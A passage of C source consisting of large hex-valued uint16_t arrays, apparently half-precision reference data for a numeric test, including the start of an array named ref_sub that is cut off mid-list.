0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0x369a, 0xb1a8, 0xbb8d, 0x2c87, 0x3266, 0xb1af, 0x35a4, 0x386c, 0xb37c, 0xac06, 0x321a, 0xb7f5, 0xb0fc, 0x3852, 0xbbec, 0x3b0c, 0x36c3, 0xba1d, 0xb796, 0xb5c3, 0x3469, 0xacbd, 0xb687, 0xaf8c, 0xacaf, 0x2aba, 0xb570, 0x3141, 0x3941, 0xb28a, 0xb6f6, 0xb06d, 0x372e, 0xbab3, 0x30a1, 0xb6df, 0xb647, 0xaee4, 0xba8f, 0xa984, 0x33d7, 0xbb3a, 0x237d, 0x3910, 0xb0e2, 0x2ee4, 0x311a, 0x3462, 0x372a, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0x369a, 0xb1a8, 0xbb8d, 0x2c87, 0x3266, 0xb1af, 0x35a4, 0x386c, 0xb37c, 0xac06, 0x321a, 0xb7f5, 0xb0fc, 0x3852, 0xbbec, 0x3b0c, 0x36c3, 0xba1d, 0xb796, 0xb5c3, 0x3469, 0xacbd, 0xb687, 0xaf8c, 0xacaf, 0x2aba, 0xb570, 0x3141, 0x3941, 0xb28a, 0xb6f6, 0xb06d, 0x372e, 0xbab3, 0x30a1, 0xb6df, 0xb647, 0xaee4, 0xba8f, 0xa984, 0x33d7, 0xbb3a, 0x237d, 0x3910, 0xb0e2, 0x2ee4, 0x311a, 0x3462, 0x372a, 0x381d, 0x32ba, 0x39b7, 0xb832, 0xb66b, 0xb45a, 0x359e, 0x331a, 0x35f7, 0xb852, 0xb5ac, 0xba73, 0xb6d1, 0x39ff, 0x30fa, 0xb41f, 0xb55b, 0x24c5, 0x303f, 0x3768, 0x3880, 0xba57, 0xb5d9, 0xb246, 0x33af, 0xa679, 0xb299, 0xba2d, 0x255b, 0x3a89, 0x2e03, 0x35bc, 0xb493, 0xb76e, 0x326a, 0x3419, 0x3482, 0x3198, 0xb624, 0x212a, 0xb0c8, 0xb1a4, 0x2349, 0x3a27, 0xb097, 0x359b, 0xa4bf, 0xb636, 0x39a0, 0x39a8, 0xb1f0, 0x39a2, 0x3c51, 0x398f, 0xb52b, 0x3927, 0x3a53, 0xb3c9, 0x374c, 0x2c2b, 0xb454, 0xb525, 0xb62c, 0x3484, 0x33c8, 0x3276, 0x2f95, 0x326f, 0xb9fc, 0xb78c, 0xaeea, 0xb376, 0xb48c, 0x33e5, 0xaed7, 0xa821, 0x2de2, 0xa135, 0x34ec, 0x3095, 0xad1a, 0xae11, 0x33ba, 0xb3a2, 0xb8c5, 0x389b, 0xb12e, 0xa96d, 0x3163, 0xb0fd, 0x3131, 0xb898, 0x31d1, 0x364b, 0x2fa8, 0xa5f8, 0xb40d, 0xb26e, 0x350e, 0x2f53, 0x3a40, 0xae0a, 0x3624, 0x37da, 0xb79e, 0x37c0, 0x3149, 0xa9c9, 0x351d, 0x34e6, 0xb602, 0xb2e0, 0x3733, 0x3a5c, 0xb299, 0x34ce, 0xb29b, 0xb17b, 0xb37e, 0xb115, 0x3485, 0x3129, 0x3591, 0x317d, 0x349d, 0x34a8, 0x3844, 0xad3f, 0xb374, 0x3cb7, 0x3587, 0x361c, 0xbbc3, 0xb955, 0xb423, 0x31e2, 0x2da4, 0x3983, 0x2e92, 0xb58b, 0xaf2d, 0x29f9, 0xb6e9, 0x17db, 0x2e88, 0x3c64, 0x37ac, 0x3667, 0xb896, 0xb8a8, 0xa75a, 0x3056, 0x3ac5, 0xb896, 0xb9bd, 0xb977, 0xb6f7, 0x372b, 0x383c, 0xb3b0, 0x301a, 0xb699, 0x355b, 0xb540, 0x2cc8, 0xadb7, 0x37b6, 0x3992, 0x2f46, 0x29df, 0xb016, 0xb825, 0x35bc, 0x3647, 0xb6a0, 0x3c8d, 0xb4f5, 0x30c1, 0xb466, 0x35f3, 0x360b, 0xb319, 0x3344, 0x34bf, 0x3612, 0x388e, 0x2df7, 0xb961, 0xb001, 0xb72d, 0x3268, 0x3907, 0x37a1, 0xaa44, 0x3385, 0x35b2, 0x329e, 0x1ea1, 0x36ce, 0x35f0, 0x37d7, 0x3897, 0xb57b, 0x1f43, 0x3285, 0xacc4, 0x2fda, 0xaa3e, 0x2a22, 0xb413, 0xae97, 0x37ba, 0x3765, 0x3339, 0xbafa, 0xae8a, 0xb123, 0xa972, 0x346c, 0x325e, 0x3181, 0xb6ff, 0xb55a, 0xb9f6, 0x3443, 0x2a40, 0xb45b, 0xb350, 0xb52f, 0x39d8, 0x343f, 0xadfd, 0x31a8, 0x3615, 0xb5a6, 0x366e, 0x3457, 0x9f26, 0xb82f, 0xa758, 0xb52a, 0x3708, 0xaf79, 0xb331, 0xba42, 0xb48b, 0xb290, 0xaeb9, 0x35f7, 0x3502, 0xb21f, 0xb836, 0x37a3, 0x36a0, 0xae9a, 0xb37e, 0xb1de, 0xb6b7, 0x9c92, 0x3572, 0x383b, 0x38b9, 0x3660, 0x1e9f, 0x344b, 0xb8bc, 0x2fb4, 0xb6a2, 0x3856, 0xb63b, 0xb33a, 0xb1ce, 0xb0b3, 0xacfa, 0x373e, 0x3864, 0x2d03, 0x9e40, 0x3a1c, 0x3558, 0x3088, 0x35dd, 0x31a3, 0xa08e, 0xb5bc, 0xa812, 0xad04, 0x2f46, 0x393f, 0xb5ca, 0x330d, 0x3878, 0xb199, 0xb40c, 0xb2ad, 0xb2c0, 0x29f0, 0xb615, 0xb4a7, 0x34c6, 0xb421, 0x394a, 0x3861, 0x19e2, 0x383e, 0x3a03, 0xb009, 0x3497, 0xb708, 0xa547, 0xacd5, 0xbac4, 0xba59, 0xb933, 0xb885, 0xb613, 0x39f1, 0x2da3, 0xb246, 0x369a, 0xb1a8, 0xbb8d, 0x2c87, 0x3266, 0xb1af, 0x35a4, 0x386c, 0xb37c, 0xac06, 0x321a, 0xb7f5, 0xb0fc, 0x3852, 0xbbec, 0x3b0c, 0x36c3, 0xba1d, 0xb796, 0xb5c3, 0x3469, 0xacbd, 0xb687, 0xaf8c, 0xacaf, 0x2aba, 0xb570, 0x3141, 0x3941, 0xb28a, 0xb6f6, 0xb06d, 0x372e, 0xbab3, 0x30a1, 0xb6df, 0xb647, 0xaee4, 0xba8f, 0xa984, 0x33d7, 0xbb3a, 0x237d, 0x3910, 0xb0e2, 0x2ee4, 0x311a, 0x3462, 0x372a, 0x381d, 0x32ba, 0x39b7, 0xb832, 0xb66b, 0xb45a, 0x359e, 0x331a, 0x35f7, 0xb852, 0xb5ac, 0xba73, 0xb6d1, 0x39ff, 0x30fa, 0xb41f, 0xb55b, 0x24c5, 0x303f, 0x3768, 0x3880, 0xba57, 0xb5d9, 0xb246, 0x33af, 0xa679, 0xb299, 0xba2d, 0x255b, 0x3a89, 0x2e03, 0x35bc, 0xb493, 0xb76e, 0x326a, 0x3419, 0x3482, 0x3198, 0xb624, 0x212a, 0xb0c8, 0xb1a4, 0x2349, 0x3a27, 0xb097, 0x359b, 0xa4bf, 0xb636, 0x39a0, 0x39a8, 0xb1f0, 0x39a2, 0x3c51, 0x398f, 0xb52b, 0x3927, 0x3a53, 0xb3c9, 0x374c, 0x2c2b, 0xb454, 0xb525, 0xb62c, 0x3484, 0x33c8, 0x3276, 0x2f95, 0x326f, 0xb9fc, 0xb78c, 0xaeea, 0xb376, 0xb48c, 0x33e5, 0xaed7, 0xa821, 0x2de2, 0xa135, 0x34ec, 0x3095, 0xad1a, 0xae11, 0x33ba, 0xb3a2, 0xb8c5, 0x389b, 0xb12e, 0xa96d, 0x3163, 0xb0fd, 0x3131, 0xb898, 0x31d1, 0x364b, 0x2fa8, 0xa5f8, 0xb40d, 0xb26e, 0x350e, 0x2f53, 0x3a40, 0xae0a, 0x3624, 0x37da, 0xb79e, 0x37c0, 0x3149, 0xa9c9, 0x351d, 0x34e6, 0xb602, 0xb2e0, 0x3733, 0x3a5c, 0xb299, 0x34ce, 0xb29b, 0xb17b, 0xb37e, 0xb115, 0x3485, 0x3129, 0x3591, 0x317d, 0x349d, 0x34a8, 0x3844, 0xad3f, 0xb374, 0x3cb7, 0x3587, 0x361c, 0xbbc3, 0xb955, 0xb423, 0x31e2, 0x2da4, 0x3983, 0x2e92, 0xb58b, 0xaf2d, 0x29f9, 0xb6e9, 0x17db, 0x2e88, 0x3c64, 0x37ac, 0x3667, 0xb896, 0xb8a8, 0xa75a, 0x3056, 0x3ac5, 0xb896, 0xb9bd, 0xb977, 0xb6f7, 0x372b, 0x383c, 0xb3b0, 0x301a, 0xb699, 0x355b, 0xb540, 0x2cc8, 0xadb7, 0x37b6, 0x3992, 0x2f46, 0x29df, 0xb016, 0xb825, 0x35bc, 0x3647, 0xb6a0, 0x3c8d, 0xb4f5, 0x30c1, 0xb466, 0x35f3, 0x360b, 0xb319, 0x3344, 0x34bf, 0x3612, 0x388e, 0x2df7, 0xb961, 0xb001, 0xb72d, 0x3268, 0x3907, 0x37a1, 0xaa44, 0x3385, 0x35b2, 0x329e, 0x1ea1, 0x36ce, 0x35f0, 0x37d7, 0x3897, 0xb57b, 0x1f43, 0x3285, 0xacc4, 0x2fda, 0xaf30, 0xb0f5, 0x3862, 0xb122, 0x36ff, 0x330f, 0xb640, 0xb90c, 0xb19c, 0x1132, 0xb71a, 0xb651, 0xb4ed, 0x3823, 0xb0d5, 0xaff7, 0xb050, 0x2f7d, 0xb40e, 0x289f, 0x2c8b, 0x330d, 0xb9bb, 0xb10c, 0xabda, 0xb3fd, 0xb6e4, 0xb914, 0xb594, 0x32d5, 0x2e38, 0x360a, 0x31f3, 0x23bd, 0x2241, 0x3849, 0x373b, 0x365e, 0xb115, 0x30b7, 0x36f8, 0x3c1c, 0x364e, 0xb0bc, 0xb192, 0x399e, 0x34b5, 0xaa83, 0xb33f, 0x3287, 0x9940, 0x3783, 0xa568, 0x390e, 0xb78e, 0xae14, 0xb014, 0xb4de, 0xb097, 0x3850, 0xb4ed, 0x3939, 0xb09f, 0x34fe, 0xb97c, 0xb86d, 0x26d1, 0xba48, 0x2efb, 0x34e4, 0x34c0, 0x37f6, 0xb1b1, 0xb138, 0x35c7, 0x3002, 0x3371, 0xb6d1, 0xae51, 0x325a, 0xaf10, 0xb481, 0xb4da, 0x35c4, 0x2c43, 0xab2c, 0x3621, 0x2b65, 0x3074, 0x39aa, 0xb280, 0xb797, 0xb31a, 0x31b8, 0xaa04, 0xbb05, 0xb02b, 0xb48c, 0x39a7, 0xb484, 0xb609, 0xb555, 0xb99e, 0x3907, 0x33ef, 0x2873, 0xba29, 0xb271, 0xb88b, 0x3768, 0x3a40, 0x357a, 0xb7d9, 0xb454, 0x2d74, 0xb6ec, 0x2ec4, 0xb884, 0x2de9, 0x384e, 0x391b, 0xb2d8, 0x389c, 0x3716, 0x34f3, 0x3376, 0x384a, 0xbb89, 0xb0c8, 0x37d1, 0xa473, 0xb62d, 0x2953, 0x32fd, 0xb844, 0x2d2d, 0xb586, 0x3404, 0xb50e, 0x3421, 0xae86, 0xb594, 0xb1e0, 0xb73e, 0x3468, 0xb822, 0xa3ad, 0x38ea, 0x300a, 0x381b, 0x37df, 0x3464, 0x391b, 0x3a31, 0x2ac5, 0xba13, 0xb7e4, 0xb67a, 0xb288, 0x389a, 0x3335 }; static const uint16_t ref_sub[3136] = { 0x2c18, 0x2c18, 0xb569, 0x2c18, 0xb569, 0x2f07, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0x2c18, 0xb569, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0x2c18, 0xb569, 0x2f07, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 0xb4c6, 0x3bc0, 0x36f9, 0xb973, 0x32e0, 0xb6d3, 0xb58b, 0xaf5d, 0x3035, 0xb899, 0xaa42, 0xb8cd, 0xad5f, 0xb86b, 0x3668, 0xaaa3, 0xb23d, 0xa2b9, 0xb6a9, 0xacf7, 0xb094, 0x32ae, 0xb78c, 0xadcf, 0x33f1, 0xb038, 0x2bba, 0x3956, 0xade7, 0x1eaa, 0x36ca, 0xb151, 0x3181, 0x3391, 0x319a, 0xb647, 0xaae4, 0x2d81, 0xb519, 0x29ea, 0x31c7, 0xb62f, 0x3963, 0xb662, 0x268f, 0x2eb5, 0xb313, 0x38cb, 0xb95b, 0x3567, 0xb219, 0xafda, 0x3481, 0x3377, 0xb426, 0xb0e8, 0xad2b, 0x33ef, 0xb6ab, 0x22c0, 0x37e4, 0xaf96, 0xb2f4, 0xab72, 0xb310, 0xac94, 0xabb0, 0x3411, 0xb81d, 0xb628, 0x3af8, 0xb50b, 0x9f2b, 0x2885, 0x352f, 0xa9a2, 0xb839, 0x36ed, 0xb246, 0xa7e8, 0xb97d, 0xb8be, 0x3375, 0x3311, 0x3161, 0x395b, 0x2658, 0xb9a8, 0x30c4, 0xae52, 0x39a7, 0x32fa, 0xb81f, 0xb4bc, 0x3683, 0x2da0, 0x29bd, 0xb0c6, 0xb06e, 0x3a92, 0xb1a0, 0xb49c, 0xb9e3, 0xb76c, 0x3278, 0x2f8d, 0xb385, 0xb10f, 0x36d2, 0xaa37, 0xb16b, 0xb06f, 0xb721, 0x3370, 0xb1d1, 0x3b13, 0xae26, 0x3402, 0xb91b, 0xb387, 0x382c, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0x2c18, 0xb569, 0x2f07, 0xb13a, 0xb337, 0x38af, 0x2617, 0xaebf, 0xb698, 0xbb23, 0xa281, 0x359e, 0x3213, 0x2fa4, 0xb53a, 0xb580, 0xb3f4, 0xaed3, 0x392c, 0x37fa, 0x3386, 0x1f2d, 0x2d80, 0xb6be, 0xb4dc, 0xb7f8, 0x340e, 0x36ca, 0xb8ab, 0x306a, 0xb550, 0x32cf, 0xb82f, 0x3036, 0x39e1, 0xaf0c, 0x386d, 0xbba7, 0x2323, 0x3525, 